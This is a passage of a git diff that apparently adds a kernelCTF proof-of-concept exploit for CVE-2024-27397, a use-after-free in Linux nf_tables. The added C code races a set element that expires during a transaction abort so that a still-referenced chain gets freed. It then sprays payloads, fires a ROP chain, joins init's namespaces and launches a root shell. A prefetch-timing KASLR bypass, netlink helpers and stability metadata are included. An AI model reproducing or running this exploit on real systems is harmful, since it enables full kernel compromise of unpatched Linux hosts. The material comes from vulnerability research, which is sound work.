nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, MY_SET); + + end_batch_chunk(batch, nlh); + } + + for (u16 i = 0; i < MAX_NUM_JUNK_OPS; i++) { + { + // Delete one of our junk sets. 
The sole purpose is to delay the transaction + const u16 set_name = generate_set_name(i); + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, &set_name, sizeof(set_name)); + + end_batch_chunk(batch, nlh); + } + } + + { + // Do an invalid operation, this triggers the abort path which undos + // everything we did before. + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) == 0) { + printf("unexpected success when triggering operation abort!\n"); + return -1; + } + + t_end = get_jiffies(); + t_delta += t_end - t_begin; + } // num_samples + + // This is not really needed, but we want to make sure that we get an idea of + // the size of the "race window". Usually any value which is higher than ~50 + // is sufficient. + t_delta /= NUM_SAMPLES; + printf("jiffie window size = %llu\n", t_delta); + + // + // We now trigger the bug + // + + int success = 0; + for (int attempt = 0; attempt < 100; attempt++) { + // 1) add a fast expiring element into the set + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Insert verdict JUMP chain B into the set using MY_KEY as identifier + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_ELEM_LIST_SET, MY_SET); + + struct nlattr* list = netlink_nest_begin(nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + + // not sure why we need this nesting .. + struct nlattr* el = netlink_attr_nest_begin(list, 0xFFFF); + + const u32 flags = htonl(0); + netlink_attr_append(el, NFTA_SET_ELEM_FLAGS, &flags, sizeof(flags)); + + // make our element expire really quickly .. + const u64 expiration = htobe64(t_delta > 200 ? 
100 : t_delta / 2); + netlink_attr_append(el, NFTA_SET_ELEM_EXPIRATION, &expiration, sizeof(expiration)); + + // we need this so that the extension gets set, choose arbitrary large timeout + const u64 timeout = htobe64(100000); + netlink_attr_append(el, NFTA_SET_ELEM_TIMEOUT, &timeout, sizeof(timeout)); + + add_verdict_data(el, NFTA_SET_ELEM_DATA, htonl(NFT_JUMP), NFTA_VERDICT_CHAIN, CHAIN_B, 0); + + struct nlattr* key = netlink_attr_nest_begin(el, NFTA_SET_ELEM_KEY); + netlink_attr_append(key, NFTA_DATA_VALUE, MY_KEY); + netlink_attr_nest_end(el, key); + netlink_attr_nest_end(list, el); + netlink_nest_end(nlh, list); + + end_batch_chunk(batch, nlh); + } + + { + struct nlmsghdr* nlh = begin_batch_chunk(batch); + + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + end_batch_chunk(batch, nlh); + } + + if (send_check(nfd, batch) != 0) { + perror("netlink_send()"); + return -1; + } + + // 2) make the element expire during a transaction abort + + bzero(buf, BUF_SIZE); + + batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + batch->nlmsg_flags = NLM_F_REQUEST ; + batch->nlmsg_seq = 0; + batch->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_NFTABLES); + + { + // Delete the victim set. This will decrease reference counters for all elements + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, MY_SET); + + end_batch_chunk(batch, nlh); + } + + for (u16 i = 0; i < MAX_NUM_JUNK_OPS; i++) { + { + // Delete one of our junk sets. The sole purpose is to delay the transaction + const u16 set_name = generate_set_name(i); + + struct nlmsghdr* nlh = begin_batch_chunk(batch); + struct nfgenmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + + netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE); + netlink_attr_put(nlh, NFTA_SET_NAME, &set_name, sizeof(set_name)); + + end_batch_chunk(batch, nlh); + } + } + + { + // Do an invalid operation, this triggers the abort path which undos + // everything we did before. 
+    // 2) make the element expire during a transaction abort
+
+    bzero(buf, BUF_SIZE);
+
+    batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+    batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
+    batch->nlmsg_flags = NLM_F_REQUEST;
+    batch->nlmsg_seq = 0;
+    batch->nlmsg_pid = 0;
+
+    data->nfgen_family = NFPROTO_IPV4;
+    data->res_id = htons(NFNL_SUBSYS_NFTABLES);
+
+    {
+      // Delete the victim set. This decrements the reference counters for
+      // all of its elements.
+
+      struct nlmsghdr* nlh = begin_batch_chunk(batch);
+      struct nfgenmsg* data = NLMSG_DATA(nlh);
+      nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+      nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET;
+      nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
+      nlh->nlmsg_seq = 0;
+      nlh->nlmsg_pid = 0;
+
+      data->nfgen_family = NFPROTO_IPV4;
+
+      netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE);
+      netlink_attr_put(nlh, NFTA_SET_NAME, MY_SET);
+
+      end_batch_chunk(batch, nlh);
+    }
+
+    for (u16 i = 0; i < MAX_NUM_JUNK_OPS; i++) {
+      {
+        // Delete one of our junk sets. The sole purpose is to delay the
+        // transaction.
+        const u16 set_name = generate_set_name(i);
+
+        struct nlmsghdr* nlh = begin_batch_chunk(batch);
+        struct nfgenmsg* data = NLMSG_DATA(nlh);
+        nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+        nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET;
+        nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
+        nlh->nlmsg_seq = 0;
+        nlh->nlmsg_pid = 0;
+
+        data->nfgen_family = NFPROTO_IPV4;
+
+        netlink_attr_put(nlh, NFTA_SET_TABLE, MY_TABLE);
+        netlink_attr_put(nlh, NFTA_SET_NAME, &set_name, sizeof(set_name));
+
+        end_batch_chunk(batch, nlh);
+      }
+    }
+
+    {
+      // Do an invalid operation; this triggers the abort path, which undoes
+      // everything we did before.
+
+      struct nlmsghdr* nlh = begin_batch_chunk(batch);
+      struct nfgenmsg* data = NLMSG_DATA(nlh);
+      nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+      nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELSET;
+      nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
+      nlh->nlmsg_seq = 0;
+      nlh->nlmsg_pid = 0;
+
+      data->nfgen_family = NFPROTO_IPV4;
+
+      end_batch_chunk(batch, nlh);
+    }
+
+    {
+      struct nlmsghdr* nlh = begin_batch_chunk(batch);
+
+      struct nfgenmsg* data = NLMSG_DATA(nlh);
+      nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+      nlh->nlmsg_type = NFNL_MSG_BATCH_END;
+      nlh->nlmsg_flags = NLM_F_REQUEST;
+      nlh->nlmsg_seq = 0;
+      nlh->nlmsg_pid = 0;
+
+      end_batch_chunk(batch, nlh);
+    }
+
+    if (send_check(nfd, batch) == 0) {
+      printf("unexpected success when triggering operation abort!\n");
+      return -1;
+    }
+
+    // wait for RCU
+    sleep(1);
+
+    // With the additional reference dropped, we can now free our chain.
+
+    bzero(buf, BUF_SIZE);
+
+    batch->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+    batch->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
+    batch->nlmsg_flags = NLM_F_REQUEST;
+    batch->nlmsg_seq = 0;
+    batch->nlmsg_pid = 0;
+
+    data->nfgen_family = NFPROTO_IPV4;
+    data->res_id = htons(NFNL_SUBSYS_NFTABLES);
+
+    {
+      // Delete chain B. Now that we have dropped an additional reference,
+      // we can delete the chain while keeping the JUMP in chain A.
+
+      struct nlmsghdr* nlh = begin_batch_chunk(batch);
+      struct nfgenmsg* data = NLMSG_DATA(nlh);
+      nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+      nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_DELCHAIN;
+      nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
+      nlh->nlmsg_seq = 0;
+      nlh->nlmsg_pid = 0;
+
+      data->nfgen_family = NFPROTO_IPV4;
+
+      netlink_attr_put(nlh, NFTA_CHAIN_TABLE, MY_TABLE);
+      netlink_attr_put(nlh, NFTA_CHAIN_NAME, CHAIN_B);
+
+      end_batch_chunk(batch, nlh);
+    }
+
+    {
+      struct nlmsghdr* nlh = begin_batch_chunk(batch);
+
+      struct nfgenmsg* data = NLMSG_DATA(nlh);
+      nlh->nlmsg_len = NLMSG_HDRLEN + sizeof(*data);
+      nlh->nlmsg_type = NFNL_MSG_BATCH_END;
+      nlh->nlmsg_flags = NLM_F_REQUEST;
+      nlh->nlmsg_seq = 0;
+      nlh->nlmsg_pid = 0;
+
+      end_batch_chunk(batch, nlh);
+    }
+
+    if (send_check(nfd, batch) != 0) {
+      printf("attempt failed! retry ..\n");
+      continue;
+    }
+
+    success = 1;
+    break;
+  }
+
+  if (!success) {
+    printf("races failed too many times\n");
+    return -1;
+  }
+
+
+  // Success, the chain will eventually be freed.
+  // Wait for RCU.
+  printf("waiting for free ..\n");
+  sleep(1);
+
+  // Now we reclaim the freed rule blobs.
+  //
+  // Note that we do NOT reclaim the freed chain object: we rely on its
+  // pointers not being erased during the object destruction. Additionally,
+  // the random kmalloc caches reduce noise, so nothing really to worry
+  // about here.
+
+  printf("spraying payloads ..\n");
+  if (spray_payload(spray_fd) < 0) {
+    exit(1);
+  }
+
+  setup_cpu_entry_area();
+  // wait for it to complete
+  sleep(1);
+
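+  // setup_cpu_entry_area() is defined elsewhere in the exploit. The usual
+  // kernelctf technique, and presumably what the helper does here, is to
+  // park the payload at a KASLR-independent address: a helper thread loads
+  // the payload values into general-purpose registers and raises an
+  // exception, so the kernel spills a pt_regs snapshot onto the per-CPU
+  // cpu_entry_area exception stack, where it stays at a fixed address.
+  // A rough, assumed sketch of the core (a SIGTRAP handler keeps the
+  // thread alive):
+  //
+  //   asm volatile(
+  //     "mov %0, %%r14\n\t"   // payload values end up in the saved pt_regs
+  //     "mov %1, %%r15\n\t"
+  //     "int3\n\t"
+  //     :: "r"(val0), "r"(val1) : "r14", "r15");
+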
+  // Trigger the payload ..
+
+  sendto(s, rop_chain_rsi, sizeof(rop_chain_rsi), 0, (struct sockaddr*)&dst, sizeof(dst));
+
+  // if we made it this far, we hopefully succeeded:
+  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
+  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
+  setns(open("/proc/1/ns/net", O_RDONLY), 0);
+
+  char* shell[] = {
+    "/bin/sh",
+    "-c",
+    "/bin/cat /flag && /bin/sh",
+    NULL,
+  };
+  execve(shell[0], shell, NULL);
+  exit(1);
+}
+
+// KASLR bypass
+//
+// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h
+//
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+  uint64_t a, d;
+  asm volatile ("mfence\n\t"
+    "RDTSCP\n\t"
+    "mov %%rdx, %0\n\t"
+    "mov %%rax, %1\n\t"
+    "xor %%rax, %%rax\n\t"
+    "lfence\n\t"
+    : "=r" (d), "=r" (a)
+    :
+    : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d<<32) | a;
+  return a;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+  uint64_t a, d;
+  asm volatile(
+    "xor %%rax, %%rax\n\t"
+    "lfence\n\t"
+    "RDTSCP\n\t"
+    "mov %%rdx, %0\n\t"
+    "mov %%rax, %1\n\t"
+    "mfence\n\t"
+    : "=r" (d), "=r" (a)
+    :
+    : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d<<32) | a;
+  return a;
+}
+
+
+// Issue prefetch hints for the given address. The prefetch completes in a
+// measurably different time for mapped and unmapped kernel addresses, which
+// is the timing signal used below to locate the kernel image.
+void prefetch(void* p)
+{
+  asm volatile (
+    "prefetchnta (%0)\n"
+    "prefetcht2 (%0)\n"
+    : : "r" (p));
+}
+
+size_t flushandreload(void* addr) // row miss
+{
+  size_t time = rdtsc_begin();
+  prefetch(addr);
+  size_t delta = rdtsc_end() - time;
+  return delta;
+}
+
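+// Optional sanity check, not part of the original exploit: verify that the
+// prefetch timing signal exists on this CPU before scanning, by comparing a
+// definitely-mapped address against a kernel-range address that is assumed
+// to be unmapped.
+static int probe_signal_ok(void) {
+  static char mapped_probe;                       // file-scope storage, surely mapped
+  void* unmapped = (void*)0xffffffff40000000ull;  // below the kernel image, assumed unmapped
+  size_t t_mapped = ~0ull, t_unmapped = ~0ull;
+
+  for (int i = 0; i < 64; i++) {
+    size_t t = flushandreload(&mapped_probe);
+    if (t < t_mapped) t_mapped = t;
+    t = flushandreload(unmapped);
+    if (t < t_unmapped) t_unmapped = t;
+  }
+
+  // with a usable signal, the mapped probe resolves measurably faster
+  return t_mapped < t_unmapped;
+}
+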
+int bypass_kaslr(u64 base) {
+  if (!base) {
+#ifdef KASLR_BYPASS_INTEL
+#define OFFSET 0
+#define START (0xffffffff81000000ull + OFFSET)
+#define END   (0xffffffffd0000000ull + OFFSET)
+#define STEP  0x0000000001000000ull
+    while (1) {
+      u64 bases[7] = {0};
+      for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+        size_t times[(END - START) / STEP] = {};
+        uint64_t addrs[(END - START) / STEP];
+
+        for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+          times[ti] = ~0;
+          addrs[ti] = START + STEP * (u64)ti;
+        }
+
+        // keep the minimum of 16 trials per candidate address
+        for (int i = 0; i < 16; i++) {
+          for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+            u64 addr = addrs[ti];
+            size_t t = flushandreload((void*)addr);
+            if (t < times[ti]) {
+              times[ti] = t;
+            }
+          }
+        }
+
+        size_t minv = ~0;
+        ssize_t mini = -1; // signed, so the not-found check below can fire
+        for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
+          if (times[ti] < minv) {
+            mini = ti;
+            minv = times[ti];
+          }
+        }
+
+        if (mini < 0) {
+          return -1;
+        }
+
+        bases[vote] = addrs[mini];
+      }
+
+      // Boyer-Moore majority vote over the sampled bases
+      int c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (c == 0) {
+          base = bases[i];
+          c = 1; // adopt a new candidate and count it
+        } else if (base == bases[i]) {
+          c++;
+        } else {
+          c--;
+        }
+      }
+
+      // verify that the candidate really has a majority
+      c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (base == bases[i]) {
+          c++;
+        }
+      }
+      if (c > ARRAY_LEN(bases) / 2) {
+        base -= OFFSET;
+        goto got_base;
+      }
+
+      printf("majority vote failed:\n");
+      printf("base = %llx with %d votes\n", base, c);
+    }
+#else
+#define START (0xffffffff81000000ull)
+#define END   (0xffffffffc0000000ull)
+#define STEP  0x0000000000200000ull
+#define NUM_TRIALS 7
+// largest contiguous mapped area at the beginning of _stext
+#define WINDOW_SIZE 11
+
+    while (1) {
+      u64 bases[NUM_TRIALS] = {0};
+
+      for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+        size_t times[(END - START) / STEP] = {};
+        uint64_t addrs[(END - START) / STEP];
+
+        for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+          times[ti] = ~0;
+          addrs[ti] = START + STEP * (u64)ti;
+        }
+
+        for (int i = 0; i < 16; i++) {
+          for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+            u64 addr = addrs[ti];
+            size_t t = flushandreload((void*)addr);
+            if (t < times[ti]) {
+              times[ti] = t;
+            }
+          }
+        }
+
+        // sliding-window sum over the timing samples
+        uint64_t max = 0;
+        int max_i = 0;
+        for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+          uint64_t sum = 0;
+          for (int i = 0; i < WINDOW_SIZE; i++) {
+            sum += times[ti + i];
+          }
+          if (sum > max) {
+            max = sum;
+            max_i = ti;
+          }
+        }
+
+        bases[vote] = addrs[max_i];
+      }
+
+      // Boyer-Moore majority vote over the sampled bases
+      int c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (c == 0) {
+          base = bases[i];
+          c = 1; // adopt a new candidate and count it
+        } else if (base == bases[i]) {
+          c++;
+        } else {
+          c--;
+        }
+      }
+
+      // verify that the candidate really has a majority
+      c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (base == bases[i]) {
+          c++;
+        }
+      }
+      if (c > ARRAY_LEN(bases) / 2) {
+        goto got_base;
+      }
+
+      printf("majority vote failed:\n");
+      printf("base = %llx with %d votes\n", base, c);
+    }
+#endif
+  }
+
+got_base:
+  printf("using kernel base %llx\n", base);
+
+  i64 diff = 0xffffffff81000000 - base;
+  printf("diff: %lld\n", diff);
+
+  #define x(name) { name -= diff; printf("corrected %s to %llx\n", #name, name); }
+  FOR_ALL_OFFSETS(x);
+  #undef x
+
+  return 0;
+}
+```
diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.c b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.c
new file mode 100644
index 00000000..a02652c8
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.c
@@ -0,0 +1,153 @@
+#include "netlink.h"
+
+#include <errno.h>
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+
+
+// Append a flat attribute to the end of the message.
+u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len) {
+    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len);
+    struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len;
+
+    attr->nla_type = nla_type;
+    attr->nla_len = NLA_HDRLEN + data_len;
+    memcpy((char*)attr + NLA_HDRLEN, data, data_len);
+
+    nlh->nlmsg_len += attr->nla_len;
+    return attr->nla_len;
+}
+
+// Append a flat attribute to the end of a (possibly nested) attribute.
+u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len) {
+    attr->nla_len = NLMSG_ALIGN(attr->nla_len);
+    struct nlattr* a = (void*)(attr) + attr->nla_len;
+
+    a->nla_type = nla_type;
+    a->nla_len = NLA_HDRLEN + data_len;
+    memcpy((char*)a + NLA_HDRLEN, data, data_len);
+
+    attr->nla_len += a->nla_len;
+    return a->nla_len;
+}
+
+// Begin/end a nested attribute directly below the message header.
+struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type) {
+    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len);
+    struct nlattr* attr = (void*)(nlh) + nlh->nlmsg_len;
+
+    attr->nla_type = nla_type;
+    attr->nla_len = NLA_HDRLEN;
+
+    return attr;
+}
+u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr) {
+    nlh->nlmsg_len += attr->nla_len;
+    return attr->nla_len;
+}
+
+// Begin/end a nested attribute below another attribute.
+struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type) {
+    attr->nla_len = NLMSG_ALIGN(attr->nla_len);
+    struct nlattr* child = (void*)attr + attr->nla_len;
+
+    child->nla_type = nla_type;
+    child->nla_len = NLA_HDRLEN;
+
+    return child;
+}
+u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner) {
+    parent->nla_len += inner->nla_len;
+    return inner->nla_len;
+}
+
+
+int __netlink_send(int fd, const void* nlh, size_t size) {
+    struct iovec iov = {
+        .iov_base = (void*)nlh,
+        .iov_len = size,
+    };
+    struct msghdr msg = {
+        .msg_name = NULL,
+        .msg_namelen = 0,
+        .msg_iov = &iov,
+        .msg_iovlen = 1,
+        .msg_control = NULL,
+        .msg_controllen = 0,
+        .msg_flags = 0,
+    };
+
+    if (sendmsg(fd, &msg, 0) < 0) {
+        perror("sendmsg()");
+        return -1;
+    }
+
+    return 0;
+}
+
+int netlink_recv(int fd, void* nlh, size_t size) {
+    struct iovec iov = {
+        .iov_base = (void*)nlh,
+        .iov_len = 0,
+    };
+    struct msghdr msg = {
+        .msg_name = NULL,
+        .msg_namelen = 0,
+        .msg_iov = NULL,
+        .msg_iovlen = 0,
+        .msg_control = NULL,
+        .msg_controllen = 0,
+        .msg_flags = MSG_TRUNC,
+    };
+
+    // Peek first to learn the size of the pending message, then receive it.
+    memset(nlh, 0, size);
+    iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC | MSG_DONTWAIT);
+    if ((ssize_t)iov.iov_len < 0) {
+        if (errno == EAGAIN) {
+            return 0;
+        }
+
+        perror("recvmsg()");
+        return -1;
+    }
+    if (iov.iov_len > size) {
+        fprintf(stderr, "message too large: %zu > %zu\n", iov.iov_len, size);
+        return -1;
+    }
+
+    msg.msg_iov = &iov;
+    msg.msg_iovlen = 1;
+    return recvmsg(fd, &msg, 0);
+}
+
+// Return 0 if the message is not an error; otherwise return the (negative)
+// kernel error code and set errno accordingly.
+int netlink_errno(const struct nlmsghdr* nlh) {
+    if (nlh->nlmsg_len == 0) {
+        return 0;
+    }
+    if (nlh->nlmsg_type != NLMSG_ERROR) {
+        fprintf(stderr, "warning: not a netlink error message: %hu\n", nlh->nlmsg_type);
+        return 0;
+    }
+    struct nlmsgerr* e = NLMSG_DATA(nlh);
+    if (e->error != 0) {
+        errno = -e->error;
+    }
+
+    return e->error;
+}
+
+int netlink_open(int proto) {
+    struct sockaddr_nl addr = {0};
+    addr.nl_family = AF_NETLINK;
+
+    int s = socket(AF_NETLINK, SOCK_RAW, proto);
+    if (s < 0) {
+        perror("socket()");
+        return s;
+    }
+    if (bind(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
+        perror("bind()");
+        return -1;
+    }
+
+    return s;
+}
diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.h b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.h
new file mode 100644
index 00000000..f88e8f58
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/netlink.h
@@ -0,0 +1,41 @@
+#ifndef __H_NETLINK
+#define __H_NETLINK
+
+#include <stdint.h>
+#include <stddef.h>
+
+#include <linux/netlink.h>
+
+typedef uint16_t u16;
+
+static inline void* nlmsg_end(struct nlmsghdr* nlh) {
+    return (char*)(nlh) + NLMSG_ALIGN(nlh->nlmsg_len);
+}
+
+static inline void* nlattr_end(struct nlattr* attr) {
+    return (char*)(attr) + NLMSG_ALIGN(attr->nla_len);
+}
+
+int netlink_open(int proto);
+
+int netlink_recv(int fd, void* nlh, size_t size);
+
+int __netlink_send(int fd, const void* nlh, size_t size);
+static inline int netlink_send(int fd, const struct nlmsghdr* nlh) {
+    return __netlink_send(fd, nlh, nlh->nlmsg_len);
+}
+
+int netlink_errno(const struct nlmsghdr* nlh);
+
+u16 netlink_attr_put(struct nlmsghdr* nlh, u16 nla_type, const void* data, u16 data_len);
+
+struct nlattr* netlink_nest_begin(struct nlmsghdr* nlh, u16 nla_type);
+u16 netlink_nest_end(struct nlmsghdr* nlh, struct nlattr* attr);
+
+struct nlattr* netlink_attr_nest_begin(struct nlattr* attr, u16 nla_type);
+u16 netlink_attr_nest_end(struct nlattr* parent, struct nlattr* inner);
+
+u16 netlink_attr_append(struct nlattr* attr, u16 nla_type, const void* data, u16 data_len);
+
+
+#endif /* __H_NETLINK */
diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/metadata.json
new file mode 100644
index 00000000..a336c0f5
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/metadata.json
@@ -0,0 +1,22 @@
+{
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v2.json",
+    "submission_ids": ["exp164"],
+    "vulnerability": {
+        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7395dfacfff65e9938ac0889dafa1ab01e987d15",
+        "cve": "CVE-2024-27397",
+        "affected_versions": ["4.1-rc1 - 6.8-rc4"],
+        "requirements": {
+            "attack_surface": ["userns"],
+            "capabilities": ["CAP_NET_ADMIN"],
+            "kernel_config": ["CONFIG_NF_TABLES"]
+        }
+    },
+    "exploits": [
+        {
+            "environment": "mitigation-6.1.55",
+            "uses": ["userns"],
"requires_separate_kaslr_leak": false, + "stability_notes": "~99%" + } + ] +} diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/original.tar.gz new file mode 100644 index 00000000..f88e7d0d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/original.tar.gz differ